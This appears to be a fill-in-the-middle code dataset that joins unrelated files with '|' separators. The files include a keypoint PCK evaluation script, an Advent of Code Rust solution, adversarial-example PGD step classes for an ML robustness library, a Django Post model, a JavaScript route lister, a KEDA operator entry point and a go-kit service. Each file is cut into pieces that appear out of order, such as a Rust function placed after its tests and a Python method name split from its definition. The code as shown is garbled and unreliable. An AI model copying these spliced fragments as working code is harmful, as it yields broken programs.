0xb1, 0x07, 0x65, 0xf4, 0xb3, 0x8b, 0xee, 0xa7, 0x5c, 0x0f, 0x0c, 0xc1, 0x8d, 0x33, 0x9c, 0x41,
0xb7, 0xa9, 0x8d, 0xc3, 0x7d, 0x1f, 0xec, 0xdc, 0xf7, 0xea, 0x08, 0x23, 0x9d, 0x39, 0x62, 0x48,
0x6d, 0x5c, 0xbd, 0xa8, 0x1b, 0xaf, 0x77, 0x7c, 0xe3, 0xfd, 0x70, 0xd0, 0x83, 0x6b, 0xc5, 0xfc,
0x07, 0xff, 0x5d, 0xf7, 0xfb, 0xeb, 0xfc, 0xdf, 0xdf, 0xdf, 0x8b, 0x97, 0x9f, 0x66, 0x0b, 0x6e,
0x73, 0xeb, 0x54, 0xf6, 0xf3, 0x23, 0xe0, 0x24, 0x5d, 0x4f, 0xcd, 0xb6, 0xe2, 0xfc, 0x24, 0x5b,
0x46, 0x8f, 0x7f, 0x05, 0x00, 0x00, 0xff, 0xff, 0xae, 0x11, 0x73, 0x73, 0x19, 0x08, 0x00, 0x00,
} | |
pck_eval.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os.path as osp
import numpy as np
import pprint
import pdb
from . import evaluate_pr
import scipy.io as sio
'''
intervals : Define thresholds to evaluate pck score
kpnames : Keypoint names
bench_stats : stats
'''
def remove_nans(x):
return x[~np.isnan(x)]
def pck_at_intervals(intervals, error):
accuracy = []
for interval in intervals:
accuracy.append(float(np.round(np.mean(np.array(error) < interval), 3)))
return accuracy
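# Example (illustrative): pck_at_intervals([0.05, 0.1], [0.02, 0.08, 0.2])
# returns [0.333, 0.667] -- the fraction of errors below each threshold.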
def ck_at_interval(intervals, error):
cks = []
for interval in intervals:
cks.append(np.array(error) < interval)
return cks # len(intervals) x error.shape
def benchmark_all_instances(intervals, kpnames, bench_stats, img_size):
stats = {}
plot_intervals = [0.025 * i for i in range(40)]
kp_error_nan_mask = bench_stats['kps_err'][:, :, 1] * 1
# pdb.set_trace()  # leftover debug breakpoint, disabled so evaluation can run unattended
# valid_inds =
kp_error_nan_mask[kp_error_nan_mask < 0.5] = np.nan
bench_stats_kps_err = bench_stats['kps_err'] / img_size
mean_kp_error = bench_stats_kps_err[:, :, 0] * kp_error_nan_mask
stats['mean_kp_err'] = [
float(t) for t in np.round(np.nanmean(mean_kp_error, 0), 4)
]
stats['median_kp_err'] = [
float(t) for t in np.round(np.nanmedian(mean_kp_error, 0), 4)
]
stats['std_kp_err'] = [
float(t) for t in np.round(np.nanstd(mean_kp_error, 0), 4)
]
stats['data'] = {}
stats['pck'] = {}
stats['interval'] = intervals
stats['kp_names'] = kpnames
stats['eval_params'] = {}
for kpx, kp_name in enumerate(kpnames):
stats['data'][kp_name] = remove_nans(mean_kp_error[:, kpx])
stats['data'][kp_name].sort()
stats['data'][kp_name] = [float(t) for t in stats['data'][kp_name]]
stats['pck'][kp_name] = pck_at_intervals(
intervals, stats['data'][kp_name]
)
stats['eval_params'][kp_name] = {}
stats['eval_params'][kp_name]['thresh'] = plot_intervals
stats['eval_params'][kp_name]['acc'] = pck_at_intervals(
plot_intervals, stats['data'][kp_name]
)
return stats
def benchmark_all_instances_2(
intervals, kpnames, bench_stats, img_size, select_kp_ids=None
):
stats = {}
plot_intervals = [0.025 * i for i in range(40)]
kp_error_nan_mask = bench_stats['kps_err'][:, :, 1] * 1
# valid_inds =
kp_error_nan_mask[kp_error_nan_mask < 0.5] = np.nan
bench_stats_kps_err = bench_stats['kps_err'] / img_size
mean_kp_error = bench_stats_kps_err[:, :, 0] * kp_error_nan_mask
stats['mean_kp_err'] = [
float(t) for t in np.round(np.nanmean(mean_kp_error, 0), 4)
]
stats['median_kp_err'] = [
float(t) for t in np.round(np.nanmedian(mean_kp_error, 0), 4)
]
stats['std_kp_err'] = [
float(t) for t in np.round(np.nanstd(mean_kp_error, 0), 4)
]
stats['data'] = {}
stats['pck'] = {}
stats['interval'] = intervals
stats['kp_names'] = kpnames
stats['eval_params'] = {}
for kpx, kp_name in enumerate(kpnames):
stats['data'][kp_name] = remove_nans(mean_kp_error[:, kpx])
stats['data'][kp_name].sort()
stats['data'][kp_name] = [float(t) for t in stats['data'][kp_name]]
stats['pck'][kp_name] = pck_at_intervals(
intervals, stats['data'][kp_name]
)
stats['eval_params'][kp_name] = {}
stats['eval_params'][kp_name]['thresh'] = plot_intervals
stats['eval_params'][kp_name]['acc'] = pck_at_intervals(
plot_intervals, stats['data'][kp_name]
)
# pdb.set_trace()
if select_kp_ids is not None:
for group_name in select_kp_ids.keys():
kp_ids = select_kp_ids[group_name]
select_kp_error = mean_kp_error[:, kp_ids]
samples = remove_nans(select_kp_error.reshape(-1))
stats['eval_params'][
'{}_acc'.format(group_name)
] = pck_at_intervals(intervals, samples.tolist())
samples = remove_nans(mean_kp_error.reshape(-1))
stats['eval_params']['acc'] = pck_at_intervals(intervals, samples.tolist())
return stats
def benchmark_vis_instances(
intervals, dist_thresholds, kpnames, bench_stats, img_size
):
stats = {}
stats['data'] = {}
stats['eval_params'] = {}
stats['pck'] = {}
stats['interval'] = intervals
bench_stats_kps_error = 1 * bench_stats['kps_err']
bench_stats_kps_error[:, :, 0] = bench_stats_kps_error[:, :, 0] / img_size
ndata_points, nkps, _ = bench_stats['kps_err'].shape
kps_vis1 = bench_stats['kps1'][:, :, 2] > 200
kps_vis2 = bench_stats['kps2'][:, :, 2] > 200
stats['eval_params']['total'] = np.sum(kps_vis1, axis=0) + 1E-10
for dx, dist_thresh in enumerate(dist_thresholds):
stats['eval_params'][dx] = {}
stats['eval_params'][dx]['correct'] = np.zeros(
(len(kpnames), len(intervals))
)
for kpx, kp_name in enumerate(kpnames):
valid_inds = np.where(
bench_stats_kps_error[:, kpx, 2] < dist_thresh
)[0].tolist()
common_inds = np.where(bench_stats_kps_error[:, kpx, 1] > 0.5
)[0].tolist()
valid_inds = set(valid_inds)
common_inds = set(common_inds)
ck = ck_at_interval(intervals, bench_stats_kps_error[:, kpx, 0])
ck = np.stack(ck, axis=1)
ex = np.array(list(common_inds & valid_inds))
if len(ex) > 0:
stats['eval_params'][dx]['correct'][kpx] += np.sum(
ck[ex, :], axis=0
)
kps_vis1_ind = np.where(kps_vis1[:, kpx])[0]
kps_vis2_ind = np.where(kps_vis2[:, kpx])[0]
ex = np.array(list(set(kps_vis1_ind) - set(kps_vis2_ind))
).astype(int)
if len(ex) > 0:
stats['eval_params'][dx]['correct'][kpx] += np.sum(
bench_stats_kps_error[ex, kpx, 2] > dist_thresh
)
stats['eval_params'][dx]['acc'] = stats['eval_params'][dx]['correct'] / \
stats['eval_params']['total'].reshape(-1, 1)
return stats
def collate_all_instances(intervals, kp_names, bench_stats, img_size):
bench_stats_kps_error = bench_stats['kps_err'] * 1
bench_stats_kps_error[:, :, 0] = bench_stats_kps_error[:, :, 0] / img_size
prediction_error = [] # N x 1
prediction_score = [] # N x 1
prediction_label = [] # N x len(intervals)
gt_label = []
kps_vis1 = bench_stats['kps1'][:, :, 2] > 200
kps_vis2 = bench_stats['kps2'][:, :, 2] > 200
for kpx, kp_name in enumerate(kp_names):
common_inds = np.where(bench_stats_kps_error[:, kpx, 1] > 0.5
)[0].tolist()
ck = ck_at_interval(intervals, bench_stats_kps_error[:, kpx, 0])
ck = np.stack(ck, axis=1)
ex = np.array(list(common_inds))
if len(ex) > 0:
prediction_error.append(bench_stats_kps_error[ex, kpx, 0])
prediction_score.append(bench_stats_kps_error[ex, kpx, 2])
prediction_label.append(ck[ex, :] * 1)
gt_label.append(ck[ex, :] * 0 + 1)
kps_vis1_ind = np.where(kps_vis1[:, kpx])[0]
kps_vis2_ind = np.where(kps_vis2[:, kpx])[0]
ex = np.array(list(set(kps_vis1_ind) - set(kps_vis2_ind))
).astype(int)
if len(ex) > 0:
prediction_error.append(bench_stats_kps_error[ex, kpx, 0])
prediction_score.append(bench_stats_kps_error[ex, kpx, 2])
prediction_label.append(ck[ex, :] * 0)
gt_label.append(ck[ex, :] * 0)
prediction_error = np.concatenate(prediction_error, axis=0)
prediction_score = np.concatenate(prediction_score, axis=0)
prediction_label = np.concatenate(prediction_label, axis=0)
gt_label = np.concatenate(gt_label, axis=0)
stats = {}
stats['pred_label'] = prediction_label
stats['gt_label'] = gt_label
stats['score'] = prediction_score # lower the score better it is.
return stats
kp_eval_thresholds = [0.05, 0.1, 0.2]
# kp_eval_thresholds = [0.05, 1.0]
'''
select_kp_ids dict is a group of kp points
'''
def run_evaluation(
bench_stats, n_iter, results_dir, img_size, kp_names, dist_thresholds,
select_kp_ids
):
json_file = osp.join(results_dir, 'stats_m1_{}.json'.format(n_iter))
stats_m1 = benchmark_all_instances_2(
kp_eval_thresholds, kp_names, bench_stats, img_size, select_kp_ids
)
stats = stats_m1
print(' Method 1 | Keypoint | Median Err | Mean Err | STD Err')
pprint.pprint(
zip(
stats['kp_names'], stats['median_kp_err'], stats['mean_kp_err'],
stats['std_kp_err']
)
)
print('PCK Values')
pprint.pprint(stats['interval'])
pprint.pprint(stats['pck'])
mean_pck = {}
# pdb.set_trace() | for i, thresh in enumerate(stats['interval']):
mean_pck[thresh] = []
for kp_name in kp_names:
mean_pck[thresh].append(stats['pck'][kp_name][i])
mean_pck = {k: np.mean(np.array(t)) for k, t in mean_pck.items()}
pprint.pprint('Mean PCK ')
pprint.pprint(mean_pck)
print('Instance Average **** ')
pprint.pprint(stats['eval_params']['acc'])
for group_name in select_kp_ids.keys():
print('Instance Average {} **** '.format(group_name))
pprint.pprint(stats['eval_params']['{}_acc'.format(group_name)])
print('########################## ')
with open(json_file, 'w') as f:
json.dump(stats, f)
if dist_thresholds is not None:
stats_m1 = benchmark_vis_instances(
kp_eval_thresholds, dist_thresholds, kp_names, bench_stats, img_size
)
stats = stats_m1
mean_pck = {}
# points_per_kp = {k: v for k, v in zip(kp_names, stats['eval_params'][0]['npoints'])}
# points_per_thresh = np.sum(np.array(points_per_kp.values()))
for dx, thresh in enumerate(dist_thresholds):
mean_pck[dx] = {}
for i, thresh in enumerate(stats['interval']):
mean_pck[dx][thresh] = []
for kx, kp_name in enumerate(kp_names):
mean_pck[dx][thresh].append(
stats['eval_params'][dx]['acc'][kx, i]
)
mean_pck[dx] = {
k: np.round(np.mean(np.array(t)), 4)
for k, t in mean_pck[dx].items()
}
# pdb.set_trace()
print('***** Distance Thresholds ***** ')
pprint.pprint('Mean PCK Acc')
pprint.pprint(mean_pck)
# pprint.pprint(points_per_kp)
stats = collate_all_instances(
kp_eval_thresholds, kp_names, bench_stats, img_size
)
pr_stats = evaluate_pr.inst_bench_evaluate(
stats['pred_label'], stats['gt_label'], stats['score']
)
pr_mat_file = osp.join(results_dir, 'pr_{}.mat'.format(n_iter))
sio.savemat(pr_mat_file, pr_stats)
return stats_m1 | |
day1.rs | use std::collections::HashSet;
#[aoc_generator(day1)]
pub fn input_generator(input: &str) -> Vec<i32> {
input.lines().map(|line| line.parse().unwrap()).collect()
}
#[aoc(day1, part1)] | #[aoc(day1, part2)]
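/// Cycles through the change list, recording each cumulative frequency in a
/// HashSet; the first value that `insert` rejects is the repeated frequency.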
pub fn solve_part2(input: &[i32]) -> i32 {
let mut records = HashSet::new();
records.insert(0);
let mut current_frequency = 0;
for change in input.iter().cycle() {
current_frequency += change;
if !records.insert(current_frequency) {
break;
}
}
current_frequency
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn part1() {
assert_eq!(
solve_part1(&input_generator(
r"+1
+1
+1"
)),
3,
);
assert_eq!(
solve_part1(&input_generator(
r"+1
+1
-2"
)),
0
);
assert_eq!(
solve_part1(&input_generator(
r"-1
-2
-3"
)),
-6
);
}
#[test]
fn part2() {
assert_eq!(
solve_part2(&input_generator(
r"+1
-1"
)),
0
);
assert_eq!(
solve_part2(&input_generator(
r"+3
+3
+4
-2
-4"
)),
10
);
assert_eq!(
solve_part2(&input_generator(
r"-6
+3
+8
+5
-6"
)),
5
);
assert_eq!(
solve_part2(&input_generator(
r"+7
+7
-2
-7
-4"
)),
14
);
}
} | pub fn solve_part1(input: &[i32]) -> i32 {
input.iter().sum()
}
|
attack_steps.py | """
**For most use cases, this can just be considered an internal class and
ignored.**
This module contains the abstract class AttackerStep as well as a few subclasses.
AttackerStep is a generic way to implement optimizers specifically for use with
:class:`robustness.attacker.AttackerModel`. In general, except for when you want
to :ref:`create a custom optimization method <adding-custom-steps>`, you probably do not need to
import or edit this module and can just think of it as internal.
"""
import torch as ch
class AttackerStep:
'''
Generic class for attacker steps, under perturbation constraints
specified by an "origin input" and a perturbation magnitude.
Must implement project, step, and random_perturb
'''
def __init__(self, orig_input, eps, step_size, use_grad=True):
'''
Initialize the attacker step with a given perturbation magnitude.
Args:
eps (float): the perturbation magnitude
orig_input (ch.tensor): the original input
'''
self.orig_input = orig_input
self.eps = eps
self.step_size = step_size
self.use_grad = use_grad
def project(self, x):
'''
Given an input x, project it back into the feasible set
Args:
x (ch.tensor): the input to project back into the feasible set.
Returns:
A `ch.tensor` that is the input projected back into
the feasible set, that is,
.. math:: \arg\min_{x' \in S} \|x' - x\|_2
'''
raise NotImplementedError
def step(self, x, g):
'''
Given a gradient, make the appropriate step according to the
perturbation constraint (e.g. dual norm maximization for :math:`\ell_p`
norms).
Parameters:
g (ch.tensor): the raw gradient
Returns:
The new input, a ch.tensor for the next step.
'''
raise NotImplementedError
def random_perturb(self, x):
'''
Given a starting input, take a random step within the feasible set
'''
raise NotImplementedError
def to_image(self, x):
'''
Given an input (which may be in an alternative parameterization),
convert it to a valid image (this is implemented as the identity
function by default as most of the time we use the pixel
parameterization, but for alternative parameterizations this function
must be overridden).
'''
return x
### Instantiations of the AttackerStep class
# L-infinity threat model
class LinfStep(AttackerStep):
"""
Attack step for :math:`\ell_\infty` threat model. Given :math:`x_0`
and :math:`\epsilon`, the constraint set is given by:
.. math:: S = \{x | \|x - x_0\|_\infty \leq \epsilon\}
"""
def project(self, x):
"""
"""
diff = x - self.orig_input
diff = ch.clamp(diff, -self.eps, self.eps)
return ch.clamp(diff + self.orig_input, 0, 1)
def step(self, x, g):
"""
"""
step = ch.sign(g) * self.step_size
return x + step
def random_perturb(self, x):
"""
"""
new_x = x + 2 * (ch.rand_like(x) - 0.5) * self.eps
return ch.clamp(new_x, 0, 1)
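# Illustrative PGD loop built on LinfStep (a sketch, not part of the library;
# `model`, `loss_fn`, `x`, `y`, and the hyperparameter values are assumed):
#
#   step = LinfStep(orig_input=x, eps=8 / 255, step_size=2 / 255)
#   adv = step.random_perturb(x)
#   for _ in range(10):
#       adv = adv.clone().detach().requires_grad_(True)
#       loss = loss_fn(model(adv), y)
#       grad, = ch.autograd.grad(loss, [adv])
#       adv = step.project(step.step(adv, grad)).detach()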
# L2 threat model
class L2Step(AttackerStep):
"""
Attack step for :math:`\ell_2` threat model. Given :math:`x_0`
and :math:`\epsilon`, the constraint set is given by:
.. math:: S = \{x | \|x - x_0\|_2 \leq \epsilon\}
"""
def project(self, x):
"""
"""
diff = x - self.orig_input
diff = diff.renorm(p=2, dim=0, maxnorm=self.eps)
return ch.clamp(self.orig_input + diff, 0, 1)
def step(self, x, g):
"""
"""
l = len(x.shape) - 1
g_norm = ch.norm(g.view(g.shape[0], -1), dim=1).view(-1, *([1]*l))
scaled_g = g / (g_norm + 1e-10)
return x + scaled_g * self.step_size
def random_perturb(self, x):
"""
"""
l = len(x.shape) - 1
rp = ch.randn_like(x)
rp_norm = rp.view(rp.shape[0], -1).norm(dim=1).view(-1, *([1]*l))
return ch.clamp(x + self.eps * rp / (rp_norm + 1e-10), 0, 1)
# Unconstrained threat model
class UnconstrainedStep(AttackerStep):
"""
Unconstrained threat model, :math:`S = [0, 1]^n`.
"""
def project(self, x):
"""
"""
return ch.clamp(x, 0, 1)
def step(self, x, g):
"""
"""
return x + g * self.step_size
def | (self, x):
"""
"""
new_x = x + (ch.rand_like(x) - 0.5).renorm(p=2, dim=0, maxnorm=self.step_size)
return ch.clamp(new_x, 0, 1)
class FourierStep(AttackerStep):
"""
Step under the Fourier (decorrelated) parameterization of an image.
See https://distill.pub/2017/feature-visualization/#preconditioning for more information.
"""
def project(self, x):
"""
"""
return x
def step(self, x, g):
"""
"""
return x + g * self.step_size
def random_perturb(self, x):
"""
"""
return x
def to_image(self, x):
"""
"""
return ch.sigmoid(ch.irfft(x, 2, normalized=True, onesided=False))
class RandomStep(AttackerStep):
"""
Step for Randomized Smoothing.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.use_grad = False
def project(self, x):
"""
"""
return x
def step(self, x, g):
"""
"""
return x + self.step_size * ch.randn_like(x)
def random_perturb(self, x):
"""
"""
return x
| random_perturb |
post.py | from django.db import models
from django.conf import settings
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from hexchan import config
class Post(models.Model):
hid = models.IntegerField(
_('HID'),
editable=False,
db_index=True
)
thread = models.ForeignKey(
'Thread',
verbose_name=_('Thread'),
related_name='posts',
on_delete=models.CASCADE,
editable=False,
db_index=True
)
created_at = models.DateTimeField(
_('Created at'),
auto_now_add=True,
editable=False,
db_index=True
)
updated_at = models.DateTimeField(
_('Updated at'),
auto_now=True,
editable=False,
db_index=True
)
text = models.TextField(
_('Text'),
max_length=2048,
blank=True
)
title = models.CharField(
_('Title'),
max_length=64,
blank=True
)
author = models.CharField(
_('Author'),
max_length=32,
blank=True
)
email = models.CharField(
_('E-mail'),
max_length=32,
blank=True
)
password = models.CharField(
_('Password'),
max_length=16,
blank=True
)
is_op = models.BooleanField(
_('Is OP'),
editable=False
)
user_was_warned = models.BooleanField(
_('User was warned'),
default=False
)
user_was_banned = models.BooleanField(
_('User was banned'),
default=False
)
is_deleted = models.BooleanField(
_('Is deleted'),
default=False,
db_index=True
)
created_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
verbose_name=_('Created by'),
on_delete=models.SET_NULL,
null=True,
editable=False
)
refs = models.ManyToManyField(
'self',
verbose_name=_('Refs'),
editable=False,
db_index=True,
symmetrical=False
)
ip_address = models.CharField(
_('IP address'),
max_length=16,
editable=False,
db_index=True
)
session_id = models.CharField(
_('Session ID'),
max_length=32,
editable=False,
db_index=True
)
class Meta:
verbose_name = _('Post')
verbose_name_plural = _('Posts')
unique_together = ['thread', 'hid']
indexes = []
ordering = ['id']
def hid2hex(self):
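# Render the post HID with the project's configured format string (the
# exact pattern, e.g. zero-padded hex, comes from hexchan.config).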
return config.POST_FULL_HID_FORMAT.format(hid=self.hid)
def get_absolute_url(self):
thread_url = reverse( | 'thread_page',
kwargs={'board_hid': self.thread.board.hid, 'thread_hid': self.thread.hid}
)
post_url = '{thread_url}#{post_hid}'.format(
thread_url=thread_url,
post_hid=self.hid2hex()
)
return post_url | |
project.js | /* @flow */
'use strict'
/* ::
import type {RouteConfiguration} from '../types.js'
*/
const glob = require('glob')
const pify = require('pify')
const values = require('./values.js')
function listAPIs (
cwd /* : string */
) /* : Promise<Array<string>> */ {
return pify(glob)('./*/index.js', { cwd })
.then((matches) => matches.map((match) => match.split('/')[1]))
}
function | (
cwd /* : string */
) /* : Promise<Array<RouteConfiguration>> */ {
return listAPIs(cwd)
.then((apis) => apis.map((api) => ({
route: `/${api}`,
module: `./${api}/index.js`,
timeout: values.DEFAULT_TIMEOUT_SECONDS
})))
}
module.exports = {
listAPIs,
listRoutes
}
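// Illustrative usage (a sketch; assumes the cwd contains one folder per API,
// each with an index.js):
//
//   listRoutes(process.cwd())
//     .then((routes) => routes.forEach((r) => console.log(r.route, r.module)))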
| listRoutes |
main.go | package main
import (
"context"
"flag"
"fmt"
"os"
"runtime"
// Import all Kubernetes client auth plugins (e.g. Azure, GCP, OIDC, etc.)
_ "k8s.io/client-go/plugin/pkg/client/auth"
"k8s.io/client-go/rest"
"github.com/kedacore/keda-olm-operator/pkg/apis"
"github.com/kedacore/keda-olm-operator/pkg/controller"
"github.com/kedacore/keda-olm-operator/version"
"github.com/operator-framework/operator-sdk/pkg/k8sutil"
kubemetrics "github.com/operator-framework/operator-sdk/pkg/kube-metrics"
"github.com/operator-framework/operator-sdk/pkg/leader"
"github.com/operator-framework/operator-sdk/pkg/log/zap"
"github.com/operator-framework/operator-sdk/pkg/metrics"
"github.com/operator-framework/operator-sdk/pkg/restmapper"
sdkVersion "github.com/operator-framework/operator-sdk/version"
"github.com/spf13/pflag"
v1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/util/intstr"
"sigs.k8s.io/controller-runtime/pkg/client/config"
logf "sigs.k8s.io/controller-runtime/pkg/log"
"sigs.k8s.io/controller-runtime/pkg/manager"
"sigs.k8s.io/controller-runtime/pkg/manager/signals"
)
// Change below variables to serve metrics on different host or port.
var (
metricsHost = "0.0.0.0"
metricsPort int32 = 8383
operatorMetricsPort int32 = 8686
)
var log = logf.Log.WithName("cmd")
func printVersion() {
log.Info(fmt.Sprintf("Operator Version: %s", version.Version))
log.Info(fmt.Sprintf("Go Version: %s", runtime.Version()))
log.Info(fmt.Sprintf("Go OS/Arch: %s/%s", runtime.GOOS, runtime.GOARCH))
log.Info(fmt.Sprintf("Version of operator-sdk: %v", sdkVersion.Version))
}
func main() {
// Add the zap logger flag set to the CLI. The flag set must
// be added before calling pflag.Parse().
pflag.CommandLine.AddFlagSet(zap.FlagSet())
// Add flags registered by imported packages (e.g. glog and
// controller-runtime)
pflag.CommandLine.AddGoFlagSet(flag.CommandLine)
pflag.Parse()
// Use a zap logr.Logger implementation. If none of the zap
// flags are configured (or if the zap flag set is not being
// used), this defaults to a production zap logger.
//
// The logger instantiated here can be changed to any logger
// implementing the logr.Logger interface. This logger will
// be propagated through the whole operator, generating
// uniform and structured logs.
logf.SetLogger(zap.Logger())
printVersion()
namespace, err := k8sutil.GetWatchNamespace()
if err != nil {
log.Error(err, "Failed to get watch namespace")
os.Exit(1)
} | if err != nil {
log.Error(err, "")
os.Exit(1)
}
ctx := context.TODO()
// Become the leader before proceeding
err = leader.Become(ctx, "keda-olm-operator-lock")
if err != nil {
log.Error(err, "")
os.Exit(1)
}
// Create a new Cmd to provide shared dependencies and start components
mgr, err := manager.New(cfg, manager.Options{
Namespace: namespace,
MapperProvider: restmapper.NewDynamicRESTMapper,
MetricsBindAddress: fmt.Sprintf("%s:%d", metricsHost, metricsPort),
})
if err != nil {
log.Error(err, "")
os.Exit(1)
}
log.Info("Registering Components.")
// Setup Scheme for all resources
if err := apis.AddToScheme(mgr.GetScheme()); err != nil {
log.Error(err, "")
os.Exit(1)
}
// Setup all Controllers
if err := controller.AddToManager(mgr); err != nil {
log.Error(err, "")
os.Exit(1)
}
if err = serveCRMetrics(cfg); err != nil {
log.Info("Could not generate and serve custom resource metrics", "error", err.Error())
}
// Add to the below struct any other metrics ports you want to expose.
servicePorts := []v1.ServicePort{
{Port: metricsPort, Name: metrics.OperatorPortName, Protocol: v1.ProtocolTCP, TargetPort: intstr.IntOrString{Type: intstr.Int, IntVal: metricsPort}},
{Port: operatorMetricsPort, Name: metrics.CRPortName, Protocol: v1.ProtocolTCP, TargetPort: intstr.IntOrString{Type: intstr.Int, IntVal: operatorMetricsPort}},
}
// Create Service object to expose the metrics port(s).
service, err := metrics.CreateMetricsService(ctx, cfg, servicePorts)
if err != nil {
log.Info("Could not create metrics Service", "error", err.Error())
}
// CreateServiceMonitors will automatically create the prometheus-operator ServiceMonitor resources
// necessary to configure Prometheus to scrape metrics from this operator.
services := []*v1.Service{service}
_, err = metrics.CreateServiceMonitors(cfg, namespace, services)
if err != nil {
log.Info("Could not create ServiceMonitor object", "error", err.Error())
// If this operator is deployed to a cluster without the prometheus-operator running, it will return
// ErrServiceMonitorNotPresent, which can be used to safely skip ServiceMonitor creation.
if err == metrics.ErrServiceMonitorNotPresent {
log.Info("Install prometheus-operator in your cluster to create ServiceMonitor objects", "error", err.Error())
}
}
log.Info("Starting the Cmd.")
// Start the Cmd
if err := mgr.Start(signals.SetupSignalHandler()); err != nil {
log.Error(err, "Manager exited non-zero")
os.Exit(1)
}
}
// serveCRMetrics gets the Operator/CustomResource GVKs and generates metrics based on those types.
// It serves those metrics on "http://metricsHost:operatorMetricsPort".
func serveCRMetrics(cfg *rest.Config) error {
// Below function returns filtered operator/CustomResource specific GVKs.
// For more control override the below GVK list with your own custom logic.
filteredGVK, err := k8sutil.GetGVKsFromAddToScheme(apis.AddToScheme)
if err != nil {
return err
}
// Get the namespace the operator is currently deployed in.
operatorNs, err := k8sutil.GetOperatorNamespace()
if err != nil {
return err
}
// To generate metrics in other namespaces, add the values below.
ns := []string{operatorNs}
// Generate and serve custom resource specific metrics.
err = kubemetrics.GenerateAndServeCRMetrics(cfg, ns, filteredGVK, metricsHost, operatorMetricsPort)
if err != nil {
return err
}
return nil
} |
// Get a config to talk to the apiserver
cfg, err := config.GetConfig() |
service.go | package service
import (
"flag"
"fmt"
endpoint1 "github.com/go-kit/kit/endpoint"
log "github.com/go-kit/kit/log"
prometheus "github.com/go-kit/kit/metrics/prometheus"
lightsteptracergo "github.com/lightstep/lightstep-tracer-go"
group "github.com/oklog/oklog/pkg/group"
opentracinggo "github.com/opentracing/opentracing-go"
zipkingoopentracing "github.com/openzipkin/zipkin-go-opentracing"
endpoint "github.com/plutov/packagemain/13-go-kit-2/bugs/pkg/endpoint"
http "github.com/plutov/packagemain/13-go-kit-2/bugs/pkg/http"
service "github.com/plutov/packagemain/13-go-kit-2/bugs/pkg/service"
prometheus1 "github.com/prometheus/client_golang/prometheus"
promhttp "github.com/prometheus/client_golang/prometheus/promhttp"
"net"
http1 "net/http"
"os"
"os/signal"
appdash "sourcegraph.com/sourcegraph/appdash"
opentracing "sourcegraph.com/sourcegraph/appdash/opentracing"
"syscall"
)
var tracer opentracinggo.Tracer
var logger log.Logger
// Define our flags. Your service probably won't need to bind listeners for
// *all* supported transports, but we do it here for demonstration purposes.
var fs = flag.NewFlagSet("bugs", flag.ExitOnError)
var debugAddr = fs.String("debug.addr", ":8080", "Debug and metrics listen address")
var httpAddr = fs.String("http-addr", ":8081", "HTTP listen address")
var grpcAddr = fs.String("grpc-addr", ":8082", "gRPC listen address")
var thriftAddr = fs.String("thrift-addr", ":8083", "Thrift listen address")
var thriftProtocol = fs.String("thrift-protocol", "binary", "binary, compact, json, simplejson")
var thriftBuffer = fs.Int("thrift-buffer", 0, "0 for unbuffered")
var thriftFramed = fs.Bool("thrift-framed", false, "true to enable framing")
var zipkinURL = fs.String("zipkin-url", "", "Enable Zipkin tracing via a collector URL e.g. http://localhost:9411/api/v1/spans")
var lightstepToken = fs.String("lightstep-token", "", "Enable LightStep tracing via a LightStep access token")
var appdashAddr = fs.String("appdash-addr", "", "Enable Appdash tracing via an Appdash server host:port")
func Run() {
fs.Parse(os.Args[1:])
// Create a single logger, which we'll use and give to other components.
logger = log.NewLogfmtLogger(os.Stderr)
logger = log.With(logger, "ts", log.DefaultTimestampUTC)
logger = log.With(logger, "caller", log.DefaultCaller)
// Determine which tracer to use. We'll pass the tracer to all the
// components that use it, as a dependency.
if *zipkinURL != "" {
logger.Log("tracer", "Zipkin", "URL", *zipkinURL)
collector, err := zipkingoopentracing.NewHTTPCollector(*zipkinURL)
if err != nil {
logger.Log("err", err)
os.Exit(1)
}
defer collector.Close()
recorder := zipkingoopentracing.NewRecorder(collector, false, "localhost:80", "bugs")
tracer, err = zipkingoopentracing.NewTracer(recorder)
if err != nil {
logger.Log("err", err)
os.Exit(1)
}
} else if *lightstepToken != "" {
logger.Log("tracer", "LightStep")
tracer = lightsteptracergo.NewTracer(lightsteptracergo.Options{AccessToken: *lightstepToken})
defer lightsteptracergo.FlushLightStepTracer(tracer)
} else if *appdashAddr != "" {
logger.Log("tracer", "Appdash", "addr", *appdashAddr)
collector := appdash.NewRemoteCollector(*appdashAddr)
tracer = opentracing.NewTracer(collector)
defer collector.Close()
} else {
logger.Log("tracer", "none")
tracer = opentracinggo.GlobalTracer()
}
svc := service.New(getServiceMiddleware(logger))
eps := endpoint.New(svc, getEndpointMiddleware(logger))
g := createService(eps)
initMetricsEndpoint(g)
initCancelInterrupt(g)
logger.Log("exit", g.Run())
}
func initHttpHandler(endpoints endpoint.Endpoints, g *group.Group) {
options := defaultHttpOptions(logger, tracer)
// Add your http options here
httpHandler := http.NewHTTPHandler(endpoints, options)
httpListener, err := net.Listen("tcp", *httpAddr)
if err != nil {
logger.Log("transport", "HTTP", "during", "Listen", "err", err)
}
g.Add(func() error {
logger.Log("transport", "HTTP", "addr", *httpAddr)
return http1.Serve(httpListener, httpHandler)
}, func(error) {
httpListener.Close()
})
}
func getServiceMiddleware(logger log.Logger) (mw []service.Middleware) {
mw = []service.Middleware{}
mw = addDefaultServiceMiddleware(logger, mw)
// Append your middleware here
return
}
func getEndpointMiddleware(logger log.Logger) (mw map[string][]endpoint1.Middleware) {
mw = map[string][]endpoint1.Middleware{}
duration := prometheus.NewSummaryFrom(prometheus1.SummaryOpts{
Help: "Request duration in seconds.",
Name: "request_duration_seconds",
Namespace: "example",
Subsystem: "bugs",
}, []string{"method", "success"})
addDefaultEndpointMiddleware(logger, duration, mw)
	// Add your endpoint middleware here
return
}
func initMetricsEndpoint(g *group.Group) |
func initCancelInterrupt(g *group.Group) {
cancelInterrupt := make(chan struct{})
g.Add(func() error {
c := make(chan os.Signal, 1)
signal.Notify(c, syscall.SIGINT, syscall.SIGTERM)
select {
case sig := <-c:
return fmt.Errorf("received signal %s", sig)
case <-cancelInterrupt:
return nil
}
}, func(error) {
close(cancelInterrupt)
})
}
| {
http1.DefaultServeMux.Handle("/metrics", promhttp.Handler())
debugListener, err := net.Listen("tcp", *debugAddr)
if err != nil {
logger.Log("transport", "debug/HTTP", "during", "Listen", "err", err)
}
g.Add(func() error {
logger.Log("transport", "debug/HTTP", "addr", *debugAddr)
